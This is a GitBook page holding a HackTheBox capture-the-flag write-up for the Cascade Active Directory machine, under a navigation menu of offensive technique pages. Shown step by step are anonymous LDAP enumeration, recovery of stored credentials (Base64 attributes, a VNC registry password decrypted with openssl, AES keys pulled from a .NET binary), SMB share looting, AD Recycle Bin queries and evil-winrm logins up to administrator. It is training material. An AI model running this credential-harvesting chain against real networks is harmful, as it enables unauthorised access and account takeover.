Pentest Everything
GitHubSupport Pentest Everything
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵PsMapExec
    • Change Log
    • BloodHound
    • Using Credentials
    • Cross Domain Usage
    • Methods
      • Command Execution
      • DCSync
      • GenRelayList / SMB Signing
      • Inject
      • IPMI
      • Kerberoast
      • MSSQL
      • Session Hunter
      • Spray
    • Modules
      • Amnesiac
      • ConsoleHistory
      • Files
      • FileZilla
      • KerbDump
      • eKeys
      • LDAP / LDAPS
      • LogonPasswords
      • LSA
      • MDF
      • NTDS
      • Notepad
      • NTLM
      • SAM
      • SCCM
      • SessionExec
      • SessionRelay
      • SSH
      • TGTDeleg
      • VNC
      • Wi-Fi
      • WinSCP
    • Target Acquisition
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page
  • Autorecon results
  • Nmap

Was this helpful?

  1. Writeups
  2. HackTheBox
  3. Active Directory

Cascade

https://app.hackthebox.com/machines/235

Last updated 2 years ago

Was this helpful?

Autorecon results

Password: PentestEverything

Nmap

nmap 10.10.10.182 -p- -Pn -sS -sV

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-02 18:33:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Add "10.10.10.182 cascade.local" to /etc/hosts.

Starting out on this machine we run a simple nmap script scan against LDAP with null credentials.

nmap -n -sV --script "ldap* and not brute" '10.10.10.182'

Seeing as we are able to pull some information with the above command, we can try ldapseacher with NULL credentials know that we know the required domain information.

ldapsearch -x -h "10.10.10.182" -D '' -w '' -b "DC=cascade,DC=local" 

We find this spits out a serious amount of information. Ideally, we will run this against and identify some user accounts.

# Search for users, cleanup and output to file
ldapsearch -x -h "10.10.10.182" -D '' -w '' -b "DC=cascade,DC=local" | grep "userPrincipalName" | sed 's/userPrincipalName: //' | sort > ADUsers.txt

Now, with a list of users we can start trying to find ways into the accounts. First up, checking the target domain for users with 'Do not require Kerberos preauthentication'.

python2 /opt/impacket-0.9.19/examples/GetNPUsers.py cascade.local/ -usersfile ADUsers.txt -dc-ip 10.10.10.182

Unfortunately we get no results here...

I also attempted password spraying the accounts for quite some time. Again, nothing.

As LDAP has spewed so much data with NULL credentials I decided to look again, this time using a graphical explorer.

sudo apt install jxplorer

Where we can login using the following settings:

After some time of pouring through the results manually we come across an interesting attribute for the user r.thompson.

cascadeLegacyPwd:clk0bjVldmE=

Decoding the Base64 value gives us a valid credential.

echo 'clk0bjVldmE=' | base64 -d
rY4n5eva

We now have the following credentials

r.thompson:rY4n5eva

We can see from the LDAP results above r.thompson is not a member of the Remote Management Users group so WinRM will not work here.

As the credentials are valid we can then try download the contents of selected shares.

smbclient -U 'r.thompson' '\\10.10.10.182\Data\' -c 'prompt OFF;recurse ON; mget *'  

Under /IT/Temp/s.smith/ we have a file called "VNC Install.reg".

We can see from the above image we have the above HEX value in the password field.

6bcf2a4b6e5aca0f

After a little bit of research on Google we find the value can be decrypted using the following command.

echo -n "6bcf2a4b6e5aca0f" | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

For the credentials:

s.smith:sT333ve2

We know from enumeration earlier that s.smith is a member of the AD group "Audit Share".

Knowing this, we can take a guess that they have access to the AUDIT$ SMB share.

smbclient -U 's.smith' '\\10.10.10.182\AUDIT$\' -c 'prompt OFF;recurse ON; mget *'  

Opening the database from Audit.db database file from the DB folder shows a Base64 encoded value for the ArkSvc user.

echo 'BQO5l5Kj9MdErXx6Q6AGOw==' | base64 -d

Of which, when, decoded appears to be encrypted.

To read the exe and DLL files included in the SMB share we need to jump onto a Windows host and use dnSpy.

Opening both CaseCrypto.dll and CaseAudit.exe in dnSpy we can obtain valuable information from both files when carefully reading the code.

IV:1tdyjCbY1Ix49842
Key:c4scadek3y654321
Mode:CBC
Size:128

This information can be plugged into the following website to reveal the encrypted string.

For the credentials:

arksvc:w3lc0meFr31nd

Where we can log in over WinRM with Evil-WinRM.

evil-winrm -u 'arksvc' -p 'w3lc0meFr31nd' -i '10.10.10.182'

Looking at our group memberships we see we are a member of the group "AD Recycle Bin".

We can use the PowerShell AD module to listed deleted users.

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
echo 'YmFDVDNyMWFOMDBkbGVz' | base64 -d 

Credentials:

tempadmin:baCT3r1aN00dles

From enumerating the SMB shares earlier we came across the following file from the Data share:

Meeting_Notes_June_2018.html

With this information we can then log in as the administrator account and grab the root flag.

evil-winrm -u 'administrator' -p 'baCT3r1aN00dles' -i '10.10.10.182' 

Github:

URL:

🚩
https://github.com/dnSpy/dnSpy/releases
https://www.devglan.com/online-tools/aes-encryption-decryption
148KB
10.10.10.182 - Cascade.zip
archive